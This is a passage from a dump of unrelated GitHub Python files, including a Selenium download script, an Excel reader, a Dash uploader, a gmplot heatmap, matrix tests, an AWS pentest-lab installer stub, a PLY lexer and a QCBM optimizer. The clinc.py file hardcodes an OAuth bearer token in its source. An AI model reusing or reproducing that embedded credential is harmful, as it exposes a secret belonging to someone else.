trans.commit()\n","repo_name":"evrimulgen/probet-1","sub_path":"probet/server/dbsvr/logic/repair_flush.py","file_name":"repair_flush.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11305689961","text":"from selenium import webdriver\r\nimport os\r\nfrom time import sleep\r\nco=webdriver.ChromeOptions()\r\nprefs={\"download.default_directory\":r\"E:\\下载\"}\r\nco.add_experimental_option('prefs',prefs)\r\ndriver=webdriver.Chrome(options=co)\r\ndriver.implicitly_wait(10)\r\ndriver.maximize_window()\r\ndriver.get(\"http://pypi.Python.org/pypi/selenium\")\r\ndriver.find_element_by_css_selector('#files-tab').click()\r\nsleep(2)\r\ndriver.find_element_by_css_selector('#files > table > tbody > tr:nth-child(1) > th > a').click()\r\nsleep(30)\r\ndriver.quit()\r\n","repo_name":"chenzizhou/python","sub_path":"python_script/test/downfile.py","file_name":"downfile.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72426016561","text":"#coding=utf-8\nimport json\nimport openpyxl\nimport sys\nimport os\n\nbase_path = os.getcwd()\nexcel_path = os.path.join(base_path, \"asset\", \"AppleID.xlsx\")\n\nclass HandExcel:\n def load_excel(self):\n open_excel = openpyxl.load_workbook(excel_path)\n return open_excel\n def get_sheet_data(self,index=None):\n sheet_name = self.load_excel().sheetnames\n if index == None:\n index = 0\n data = self.load_excel()[sheet_name[index]]\n return data\n def get_cell_value(self,row,cols):\n \"获取某个单元格的内容\"\n value = self.get_sheet_data().cell(row=row,column=cols).value\n return value\n def get_row(self):\n '''获取行数'''\n row = self.get_sheet_data().max_row\n return row\n def get_row_value(self,row):\n '''获取一整行数据'''\n row_list =[]\n for i in self.get_sheet_data()[row]:\n row_list.append(i.value)\n return row_list\n def excel_write_data(self,row,cols,value):\n wb = self.load_excel()\n wr = 
wb.active\n wr.cell(row,cols,value)\n wb.save(excel_path)\n\n def get_columns_value(self,key=None):\n '''获取某一列的数据'''\n column_list = []\n if key ==None:\n key ='A'\n column_list_data = self.get_sheet_data()[key]\n for i in column_list_data:\n column_list.append(i.value)\n return column_list\n\n def get_rows_number(self,case_id):\n '''获取行号'''\n num = 1\n cols_data = self.get_columns_value()\n for col_data in cols_data:\n if case_id == col_data:\n return num\n num = num +1\n return num\n\n def get_excel_data(self):\n '''获取excel里面所有的数据'''\n data_list = []\n for i in range(self.get_row()):\n data_list.append(self.get_row_value(i+2))\n return data_list\n\n\nif __name__ ==\"__main__\":\n handexcel = HandExcel()\n print(handexcel.get_excel_data())","repo_name":"Tech-Chao/UnlockApple","sub_path":"handle_excel.py","file_name":"handle_excel.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"18207713559","text":"'''\n***********************************\nAuthor: Pranav Surampudi\nDate: 8 August 2018\nEncoding: utf-8\n***********************************\n'''\ndef apply_to_each(list_val, function):\n \"\"\"return the absolute value of the list elements\"\"\"\n ans = []\n for j in list_val:\n ans.append(function(j))\n print(ans)\ndef main():\n \"\"\"Main Function\"\"\"\n data = input()\n data = data.split()\n list1 = []\n for j in data:\n list1.append(int(j))\n apply_to_each(list1, abs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Pranav-20186017/CSPP1","sub_path":"CSPP1-Practice/CSPP1-Assignments/M9/Functions and Objects Exercise-1/functions_and_objects_1.py","file_name":"functions_and_objects_1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16178119175","text":"import numpy as np\nimport pandas as pd\n\ndef collapsemax(group, collapsecolumn='Lambda'):\n \"\"\"Collapse to maximum along column\"\"\" \n index = group[collapsecolumn].idxmax()\n return pd.Series({column : group[column].loc[index] for column in group.columns})\n\ndef printunique(df, nunique=1, returnnonunique=False):\n if returnnonunique:\n nonuniquecolumns = []\n for key in sorted(df.columns):\n uniques = df[key].unique()\n if len(uniques) == 1:\n print('{0}: {1}'.format(key, uniques[0]))\n elif len(uniques) <= nunique:\n print('{0}: {1}'.format(key, '; '.join(str(s) for s in uniques)))\n elif returnnonunique:\n nonuniquecolumns.append(key)\n if returnnonunique:\n return nonuniquecolumns\n\ndef intelligent_describe(df, **kwargs): \n ukwargs = dict(returnnonunique=kwargs.get('returnnonunique', True),\n nunique=kwargs.get('nunique', 1))\n print('-----------------------------------------------------')\n print('values of columns with no more than {0} unique entries'.format(ukwargs['nunique']))\n print('')\n nonuniquecolumns = printunique(df, **ukwargs)\n print('-----------------------------------------------------')\n print('summary statistics of other columns')\n print('')\n dkwargs = dict(include=kwargs.get('include', None),\n exclude=kwargs.get('exclude', None),\n percentiles=kwargs.get('percentiles', None))\n print(df[nonuniquecolumns].describe(**dkwargs))\n print('-----------------------------------------------------')\n\ndef flatten(l):\n return [item for sublist in l for item in sublist]\n\ndef loadnpz(filename):\n \"\"\"Load a npz file as a pandas DataFrame\"\"\"\n f = np.load(filename)\n df = 
pd.DataFrame(f['data'], columns=f['columns'])\n df = df.apply(pd.to_numeric, errors='ignore')\n df.sort_values(list(df.columns), inplace=True)\n return df\n","repo_name":"andim/transitions-paper","sub_path":"lib/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29849116275","text":"import base64#解码或者编码二进制\nimport io\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\n\napp = dash.Dash(__name__)\napp.layout=html.Div([\n dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Drag and Drop or ',\n html.A('Select Files')\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n ),\n html.Div(id='output-data-upload'),\n])\n\n@app.callback(Output('output-data-upload', 'children'),\n [Input('upload-data', 'contents')])\ndef parse_contents(contents):\n if not contents is None:#很重要要不页面会出错\n decoded = base64.b64decode(contents.split(\",\")[1])\n df=pd.read_table(io.StringIO(decoded.decode('utf-8')),sep=\"\\t\",header=0)\n return dash_table.DataTable(\n data=df.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in df.columns]\n )\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"fanyucai1/Dash_learn","sub_path":"Upload_tsv2table.py","file_name":"Upload_tsv2table.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13716271517","text":"from __future__ import print_function\n\n\"\"\"Single file templater\n\nThis program takes a single file as input and uses the built-in string format\nmethod to replace the occurence of brace-enclosed variables by values given on\nthe command-line.\n\"\"\"\n\n__author__ = \"Pierre de Buyl \"\n__version__ = \"0.1\"\n\n\ndef main():\n import sys\n import argparse\n\n desc = \"\"\"Generic templater\n Replaces occurences of the form {variable} by the value of the command-line\n argument \"--variable value\". Single character variables may use a single\n dash. 
The output is to standard out.\n\n Example:\n %s template.txt --name perl\n\n Will transform \"The name is {name}\" into \"The name is perl\" in the output.\n \"\"\" % (sys.argv[0],)\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter, description=desc)\n parser.add_argument('template_file', type=str, help='template file')\n parser.add_argument('args', nargs=argparse.REMAINDER,\n help=('List of variables to replace in the template '\n 'file of the form --variable value or -x value'))\n args = parser.parse_args()\n\n EMPTY = 0\n INUSE = 1\n\n # Parse the content of args.args\n state = EMPTY\n values = {}\n for a in args.args:\n if state == EMPTY:\n if len(a) > 2 and a.startswith('--'):\n key = a[2:]\n state = INUSE\n continue\n elif len(a) == 2 and a.startswith('-'):\n key = a[1:]\n state = INUSE\n continue\n else:\n raise ValueError('Invalid argument')\n if state == INUSE:\n values[key] = a\n state = EMPTY\n\n if state == INUSE:\n print(\"Command-line variable %s incomplete\" % key, file=sys.stderr)\n sys.exit(0)\n\n tmpl = open(args.template_file, 'r').read()\n\n try:\n print(tmpl.format(**values), end='')\n except KeyError:\n for l in tmpl.splitlines():\n try:\n l.format(**values)\n except KeyError as e:\n print(\"Variable %s is not defined\" % e, file=sys.stderr)\n\nif __name__ == '__main__':\n main()\n","repo_name":"pdebuyl/sftmpl","sub_path":"sftmpl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"8338028169","text":"import gmplot\nfrom math import asin, atan2, cos, degrees, radians, sin\nfrom weather import get_wind_dir, get_wind_bft\nimport os\nimport webbrowser\n\n\n# FUNCTIONS\n\ndef get_point_at_distance(lat1, lon1, d, bearing, R=6371):\n \"\"\"\n lat: initial latitude, in degrees\n lon: initial longitude, in degrees\n d: target distance from initial\n bearing: (true) heading in degrees\n R: optional radius of sphere, defaults to mean radius of earth\n\n Returns new lat/lon coordinate {d}km from initial, in degrees\n \"\"\"\n lat1 = radians(lat1)\n lon1 = radians(lon1)\n a = radians(bearing)\n lat2 = asin(sin(lat1) * cos(d/R) + cos(lat1) * sin(d/R) * cos(a))\n lon2 = lon1 + atan2(\n sin(a) * sin(d/R) * cos(lat1),\n cos(d/R) - sin(lat1) * sin(lat2)\n )\n return (degrees(lat2), degrees(lon2),)\n\ndef heatmap(api_key,lat,lon,fire_geo=None,fire_station=None,weights=None):\n \"\"\"\n api_key: key for OpenWeatherMap\n lat: initial latitude\n lon: initial longitude\n fire_geo: list object with tupel of lat and long of fire spots\n weight: list object with same size like fire_geo, includes fire intensity of the spot. 
Default None\n\n Returns a map with current fire as heatpoints\n \"\"\"\n # LOCATION\n map = gmplot.GoogleMapPlotter(lat, lon, 14.5) \n map.apikey = \"XXX\"\n\n # FIRE SPOTS\n #add heatmap\n if fire_geo != None:\n lats, longs = zip(*fire_geo)\n \n map.heatmap(lats, longs,radius=20, weights= weights)\n path = fire_geo + fire_station\n path_lats, path_longs = zip(*path)\n map.plot(path_lats, path_longs, \"cornflowerblue\", edge_width=3.0)\n fire_lat, fire_lon = zip(*fire_station)\n \n map.scatter(fire_lat, fire_lon, marker=True,size=100,color='red', label='Firestation')\n\n #WIND\n #add Scatter in Wind direction\n scatter = []\n #add Scatter in color of Wind speed green is low and red is high\n wind_speed = []\n wind_color = {0: 'lightgreen', 1: 'forestgreen', 2: 'deepskyblue', 3: 'royalblue', 4: 'navy',\n 5: 'blueviolet', 6: 'indigo', 7: 'purple', 8: 'darkmagenta', 9: 'crimson', 10: 'red', \n 11: 'darkred', 12: 'maroon'}\n #loop over fire spots\n for n in fire_geo:\n #get wind degree from weather script\n wind = get_wind_dir(api_key,n[0], n[1])\n #get wind speed in bft from weather script\n bft = get_wind_bft(api_key,n[0], n[1])\n #append speed to list\n wind_speed.append(bft)\n #get centre of the scatter \n lat, lon = get_point_at_distance(n[0], n[1],0.05,wind)\n #append each center point to list\n scatter.append((lat,lon))\n #unzip to add it to gmplot.scatter soon \n slats, slongs = zip(*scatter)\n #get wind colors from dictonary\n colors = [wind_color[x] for x in wind_speed]\n #plot scatters\n map.scatter(slats, slongs, colors, marker=False, symbol='o', size= 100, alpha=0.4)\n #map.text(lat, lon + 0.02, 'Wind:' + str(set([wind_type[x] for x in wind_speed])))\n #plot whole map\n map.draw( \"fire.html\" )\n\n# TESTING\n# Loerrach:\n\n# loe_lat = 47.6169\n# loe_lon = 7.6709\n# fire_geo = [\n# (47.6170, 7.6709), (47.6270, 7.6710), (47.6188, 7.6709),\n# (47.6169, 7.6758)]\n\n\n# heatmap(loe_lat,loe_lon,fire_geo)\n\n# Freiburg:\n\n# fr_lat = 47.997791\n# fr_lon = 7.842609\n# fire_spots = [\n# (47.998891, 7.842609), (47.994791, 7.843609)]\n\n# heatmap(fr_lat,fr_lon,fire_spots)","repo_name":"baechlja/Wildfires","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73998418483","text":"import pytest\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom scipy import linalg, sparse\n\nfrom xesn.matrix import RandomMatrix, SparseRandomMatrix\n\nclass TestMatrix:\n n_rows = 10\n n_cols = 10\n factor = 1.0\n normalization = \"multiply\"\n random_seed = 0\n\n\n# --- Test distributions from both Dense and Sparse matrices\n@pytest.mark.parametrize(\n \"distribution, error\",\n [\n (\"uniform\", None),\n (\"gaussian\", None),\n (\"normal\", None),\n (\"gamma\", NotImplementedError),\n ],\n)\nclass TestDist(TestMatrix):\n\n RM = RandomMatrix\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"factor\", \"normalization\", \"random_seed\"]}\n\n def test_dist(self, distribution, error):\n\n if error is None:\n rm = self.RM(distribution=distribution, **self.kw)\n rm()\n\n else:\n with pytest.raises(error):\n self.RM(distribution=distribution, **self.kw)\n\n\nclass TestSparseDist(TestDist):\n \"\"\"This inherits and runs the distribution tests from above\"\"\"\n\n RM = SparseRandomMatrix\n format = \"csr\"\n density = 0.99\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", 
\"n_cols\", \"factor\", \"normalization\", \"random_seed\", \"format\", \"density\"]}\n\n\n# --- Test normalization\n@pytest.mark.parametrize(\n \"distribution\",\n [ \"normal\", \"uniform\" ]\n)\n@pytest.mark.parametrize(\n \"normalization, dense_function, sparse_function, rtol, error\",\n [\n (\"svd\",\n linalg.svdvals,\n lambda x: sparse.linalg.svds(x, k=1, return_singular_vectors=False),\n 1e-7,\n None),\n (\"eig\",\n linalg.eigvals,\n lambda x: sparse.linalg.eigs(x, k=1, return_eigenvectors=False),\n 1e-7,\n None),\n (\"multiply\",\n np.std,\n lambda x: np.std(x.data),\n 1e-1,\n None),\n (\"spectral_radius\", None, None, None, NotImplementedError),\n ]\n)\nclass TestNorm(TestMatrix):\n\n RM = RandomMatrix\n factor = 10\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"factor\", \"random_seed\", \"factor\"]}\n\n def test_norm(self, distribution, normalization, dense_function, sparse_function, rtol, error):\n\n if error is None:\n rm = self.RM(distribution=distribution, normalization=normalization, **self.kw)\n A = rm()\n f = dense_function if not sparse.issparse(A) else sparse_function\n expected = np.max(np.abs(f(A)))\n if distribution != \"uniform\":\n assert_allclose( self.factor, expected, rtol=rtol )\n\n else:\n with pytest.raises(error):\n rm = self.RM(distribution=distribution, normalization=normalization, **self.kw)\n\n\nclass TestSparseNorm(TestNorm):\n \"\"\"This inherits and runs sparse versions of all normalization tests above\"\"\"\n\n RM = SparseRandomMatrix\n factor = 10\n format = \"csr\"\n density = 0.7\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"random_seed\", \"factor\", \"format\", \"density\"]}\n\n@pytest.mark.parametrize(\n \"n_cols, density, sparsity, connectedness, error\",\n [\n (10, 0.1, None, None, None),\n (10, None, 0.9, None, None),\n (10, None, None, 1, None),\n (10, None, None, None, TypeError),\n (10, 0.1, 0.9, None, TypeError),\n (10, 0.1, None, 1, TypeError),\n (10, None, 0.9, 1, TypeError),\n (5, 0.1, None, None, None),\n (5, None, 0.9, None, None),\n (5, None, None, 1, TypeError),\n ]\n )\ndef test_sparse_mat_inputs(n_cols, density, sparsity, connectedness, error):\n \"\"\"test the whole density, sparsity, connectivity stuff\"\"\"\n\n if error is None:\n sm = SparseRandomMatrix(\n n_rows=10,\n n_cols=n_cols,\n factor=1.0,\n distribution=\"normal\",\n normalization=\"multiply\",\n density=density,\n sparsity=sparsity,\n connectedness=connectedness,\n )\n sm()\n\n if n_cols == 10:\n assert_allclose(sm.density, 0.1)\n else:\n with pytest.raises(error):\n sm = SparseRandomMatrix(\n n_rows=10,\n n_cols=n_cols,\n factor=1.0,\n distribution=\"normal\",\n normalization=\"multiply\",\n density=density,\n sparsity=sparsity,\n connectedness=connectedness,\n )\n","repo_name":"timothyas/xesn","sub_path":"xesn/test/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71984554803","text":"#!/usr/bin/env python3\n\nimport logging\nimport argparse\nimport os\nfrom src.core import *\nfrom src.utils import *\nfrom src.tasks import installer\nfrom config import config\n\n\n__version__ = \"0.1\"\n__date__ = \"10.05.2021\"\n__author__ = \"Fabien Guillot\"\n__email__ = \"fguillot@vectra.ai\"\n__description__= \"AWS Pentest Lab Environment\"\n\n\n\ndef main(args):\n \n if args.install:\n \n checkDistro()\n 
create_dir(config.BASE_INSTALL_PATH)\n whoami()\n checkPythonDefaultVersion()\n checkpythonMinVersion()\n #install_prereqs()\n \n if checkpyenv() is not True:\n \n print('installing pyenv for current user...')\n installPyenv()\n \n askSudoPassword()\n installer() \n \n elif args.uninstall:\n \n print('Uninstall')\n \n else:\n \n print_error('No valid choice. Exiting...')\n exit()\n\nif __name__ == '__main__':\n \n if not check_internet():\n \n print_error('An internet connection is required. Exiting...')\n exit()\n \n else:\n \n print_status('Internet connection OK') \n \n \n parser = argparse.ArgumentParser(description='A set of tools for S3')\n parser.add_argument('-i', '--install', dest = \"install\", action = \"store_true\", default = False, help='Install the environment')\n parser.add_argument('-u', '--uninstall', dest = \"uninstall\", action = \"store_true\", default = False, help='Uninstall the environment')\n parser.add_argument(\"-v\", \"--debug\", dest=\"debug\", action = \"store_true\", default = False, help = \"Print debug information to the screen.\")\n \n \n try:\n\n args = parser.parse_args()\n main(args)\n \n except Exception as e:\n logging.exception(\"Exception: {0!s}\".format(e))\n exit(1)\n \n ","repo_name":"danymello/vectra_aws_pentest","sub_path":"aws_pentest_lab.py","file_name":"aws_pentest_lab.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39149489910","text":"import requests\nimport os\nfrom sqlalchemy import create_engine, Integer, Column, String, DECIMAL, DateTime\nfrom sqlalchemy.orm import declarative_base, Session\n\nAPI_BASE_URL = 'https://api.weatherapi.com/v1/'\nAPI_KEY = os.getenv('WEATHER_API_KEY')\nCITY = 'Ahwaz'\nDB_USERNAME = os.getenv('WEATHER_DB_USERNAME')\nDB_PASSWORD = os.getenv('WEATHER_DB_PASSWORD')\nDB_HOST = os.getenv('WEATHER_DB_HOST')\nDB_NAME = os.getenv('WEATHER_DB_NAME')\n\nengine = create_engine(f'mysql+mysqldb://{DB_USERNAME}:{DB_PASSWORD}@{DB_HOST}/{DB_NAME}')\nBase = declarative_base()\n\n\nclass Weather(Base):\n __tablename__ = 'weather_table'\n\n id = Column(Integer, primary_key=True)\n city_name = Column(String(255), nullable=False)\n temp_c = Column(DECIMAL(precision=5, scale=2))\n local_time = Column(DateTime)\n wind_kph = Column(DECIMAL(precision=5, scale=2))\n\n\nBase.metadata.create_all(engine)\n\n\ndef get_weather():\n url = API_BASE_URL + 'current.json'\n params = {\n 'q': CITY,\n 'key': API_KEY,\n }\n\n return requests.get(\n url,\n params=params,\n ).json()\n\n\nif __name__ == '__main__':\n weather_json = get_weather()\n with Session(engine) as session:\n weather = Weather(\n city_name=weather_json['location']['name'],\n temp_c=weather_json['current']['temp_c'],\n local_time=weather_json['location']['localtime'],\n wind_kph=weather_json['current']['wind_kph'],\n )\n session.add(weather)\n session.commit()\n","repo_name":"alinri/weather-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32795954778","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#ex190\n#리스트 입력\napart = [ [101, 102], [201, 202], [301, 302] ]\n#for문 확인, 값 출력\nfor row in apart:\n for col in row:\n print(col, \"호\")\n#-----출력\nprint(\"-\" * 
5)\n\n","repo_name":"wnsl01/MSE_Python","sub_path":"ex190.py","file_name":"ex190.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29133796696","text":"import ply.lex as lex\n\ntokens = ['NAME', 'NUMBER']\nliterals = [ '+','=', '(', ')']\n\nt_ignore = ' \\t'\nt_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'\n\ndef t_NUMBER(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\ndef t_error(t):\n if __name__ == \"__main__\":\n print(\"Illegal character '%s'\" % t.value[0])\n else:\n print(\"Error in input\")\n exit()\n t.lexer.skip(1)\n\nlexer = lex.lex()\n\nline = \"\"\ndata = \"\"\n\nwhile True:\n line = input(\"\")\n if line == \"#\":\n break\n if data == \"\":\n data = line\n else:\n data += '\\n' + line\n\nlexer.input(data)\n\nwhile True:\n tok = lexer.token()\n if not tok: \n break\n if __name__ == \"__main__\":\n print(('{}'.format(tok.type), tok.value, tok.lineno, tok.lexpos))","repo_name":"kialanpillay/compiler-construction","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25947744559","text":"'''\nget app_key which will be used in api.py for requesting clinc\nrerun this file only if the app_key in api.py expired\n'''\n\n\nimport requests\n\noauth_token = 'PODBMIDjizV32PyTOCo1muXxcqw7CI'\n\nprint(requests.post(\n 'https://api.clinc.ai:443/v1/apps/applicationtoken/',\n params={'force': 'True', 'scopes': 'query'},\n headers={'Authorization': 'Bearer {}'.format(oauth_token),\n 'Content-Type': 'application/x-www-form-urlencoded'}\n).json())\n","repo_name":"quyuyi/convoAI-travel-agent","sub_path":"script/clinc.py","file_name":"clinc.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"20944904159","text":"'''Given an input by the user in the form of a positive integer,\nthe program should print out a triangle-shaped pattern made of\nthe star character (*). The input should be stored in a variable called N.\nN represents the number of rows in the pattern. 
The number of stars in each row increases by 2 each time.'''\nN = int(input('N: '))\nx = 1\n'''for i in range(0, N):\n for j in range(0, i+1):\n print(f\"{carac:^5}\", end= '')\n print('')'''\nfor i in range(N, 0, -1):\n spaces = i - 1\n caracteres = N - i + x\n print(' ' * spaces, '*' * caracteres)\n x = x + 1\n\n","repo_name":"MarceliFioravante/python_exercises","sub_path":"python_exercises/Star_triangle.py","file_name":"Star_triangle.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71743540722","text":"data = open('data.txt', 'r')\n_list = data.read().split('\\n')\ndata.close()\n\ndef get_string_and_map():\n inst_map = {}\n string = \"\"\n for exp in _list:\n if(exp == ''):\n continue\n \n if('->' in exp):\n elem1 = (exp.split('->')[0]).strip()\n elem2 = (exp.split('->')[1]).strip()\n\n if not (elem1 in inst_map):\n inst_map[elem1] = elem2\n continue\n \n string = exp\n return inst_map, string\n\ndef modify(string_map, inst_map, step_count):\n while(step_count):\n new_string = {}\n for elem in string_map:\n count = string_map[elem]\n \n\n e1 = elem[0] + inst_map[elem]\n e2 = inst_map[elem] + elem[1]\n\n if(e1 not in new_string):\n new_string[e1] = count\n else:\n new_string[e1] += count\n\n if(e2 not in new_string):\n new_string[e2] = count\n else:\n new_string[e2] += count\n\n string_map = new_string\n step_count -= 1\n return string_map\n \n \ndef get_string_map(string):\n string_map = {}\n for i in range(0, len(string) - 1):\n exp = string[i:i +2]\n if(exp not in string_map):\n string_map[exp] = 1\n else:\n string_map[exp] += 1\n return string_map\n\ndef get_diff(string_map):\n max_count = 0\n min_count = 21881896935290000000\n counter = {}\n flag = 0\n for s in string_map:\n e1 = s[0]\n e2 = s[1]\n value = string_map[s]\n if(flag == 0):\n counter[e1] = value\n counter[e2] = value\n flag = 1\n else:\n if(e2 not in counter):\n counter[e2] = value\n else:\n counter[e2] += value\n\n for c in counter:\n max_count = max(max_count, counter[c])\n min_count = min(min_count, counter[c])\n\n return max_count - min_count\n\ninst_map, string = get_string_and_map()\nstring_map = get_string_map(string)\nstring_map = modify(string_map, inst_map, 40)\nres = get_diff(string_map)\nprint(res)\n\n ","repo_name":"anugoen4/AOC_2021","sub_path":"Day_14_Extended_Polymerization/python_part_2.py","file_name":"python_part_2.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39230364845","text":"import qe.sdk.v1 as qe\nimport numpy as np\nimport typing\nfrom typing import List, Optional, Union\nimport json\n\nfrom zquantum.core.history.recorder import recorder\nfrom zquantum.core.history.save_conditions import every_nth\nfrom zquantum.core.utils import create_object\nfrom zquantum.core.interfaces.ansatz import Ansatz\nfrom zquantum.core.serialization import save_optimization_results\nimport zquantum.core.bitstring_distribution\nfrom zquantum.core.bitstring_distribution import BitstringDistribution\nfrom zquantum.core.typing import Specs\nfrom zquantum.core.utils import load_from_specs\nfrom zquantum.qcbm.ansatz import QCBMAnsatz\nfrom zquantum.qcbm.cost_function import QCBMCostFunction\nfrom qequlacs import QulacsSimulator\nimport itertools\nimport random\nimport csv\n\ndef get_rc(n):\n assert isinstance(n,int)\n root = np.sqrt(n)\n if int(root) == root:\n return root,root\n else:\n for i in 
range(int(root),0,-1):\n co,rem = divmod(n,i)\n if rem == 0:\n return co,i\n return n,1\n\n\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef get_specs(method: str,options: dict):\n specs={}\n if method in ['adam',\n 'adagrad',\n 'adamax',\n 'nadam',\n 'sgd',\n 'momentum',\n 'nesterov',\n 'rmsprop',\n 'rmsprop-nesterov']:\n\n specs['method']=method\n specs['options']=options\n specs['module_name']=\"zquantum.optimizers.gd_optimizer\"\n specs['function_name']='GDOptimizer'\n\n elif method in ['cobyla','l-bfgs-b','bfgs']:\n specs['method'] = method\n specs[\"module_name\"]=\"zquantum.optimizers.scipy_optimizer\"\n specs['function_name']='ScipyOptimizer'\n specs['options']=options\n elif method[0:6] == 'basin-':\n minimizer_kwargs={}\n specialized=method[6:]\n minimizer_kwargs['method'] = specialized\n for k,v in options.items():\n if k == 'minimizer_kwargs':\n for q,p in v.items():\n minimizer_kwargs[q]=p\n else:\n specs[k]=v\n specs['minimizer_kwargs']=minimizer_kwargs\n specs['module_name']='zquantum.optimizers.basin_hopping'\n specs['function_name']='BasinHoppingOptimizer'\n specs['recorder'] = lambda x: recorder(x,save_condition=every_nth(5))\n return specs\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef get_ansatz(n_qubits:int,n_layers:int,topology:str):\n return QCBMAnsatz(n_layers,n_qubits,topology)\n\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef generate_random_ansatz_params(\n ansatz,\n number_of_parameters: Optional[int] = None,\n min_value: float = -np.pi * 0.5,\n max_value: float = np.pi * 0.5,\n seed: int = None,\n):\n\n if ansatz is not None:\n number_of_parameters = ansatz.number_of_params\n\n if seed is not None:\n np.random.seed(seed)\n\n params = np.random.uniform(min_value, max_value, number_of_parameters)\n return params\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef get_distribution(n: int):\n nrows,ncols = get_rc(n)\n data = []\n for h in itertools.product([0, 1], repeat=ncols):\n pic = np.repeat([h], nrows, 0)\n data.append(pic.ravel().tolist())\n\n for h in itertools.product([0, 1], repeat=nrows):\n pic = np.repeat([h], ncols, 1)\n data.append(pic.ravel().tolist())\n\n data = np.unique(np.asarray(data), axis=0)\n num_desired_patterns = int(len(data))\n num_desired_patterns = max(num_desired_patterns, 1)\n data = random.sample(list(data), num_desired_patterns)\n\n distribution_dict = {}\n for pattern in data:\n bitstring = \"\"\n for qubit in pattern:\n bitstring += str(qubit)\n\n distribution_dict[bitstring] = 1.\n return BitstringDistribution(distribution_dict)\n\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"10Gi\"\n ),\n)\ndef optimize_variational_qcbm_circuit(\n ansatz,\n optimizer_specs,\n initial_parameters,\n target_distribution,\n keep_history: bool,\n):\n backend = QulacsSimulator()\n if isinstance(optimizer_specs, str):\n optimizer_specs = json.loads(optimizer_specs)\n optimizer = create_object(optimizer_specs)\n cost_function = QCBMCostFunction(\n ansatz=ansatz,\n backend=backend,\n n_samples = None,\n distance_measure=zquantum.core.bitstring_distribution.compute_clipped_negative_log_likelihood,\n distance_measure_parameters={\"epsilon\": 1e-6},\n target_bitstring_distribution=target_distribution,\n )\n opt_results = 
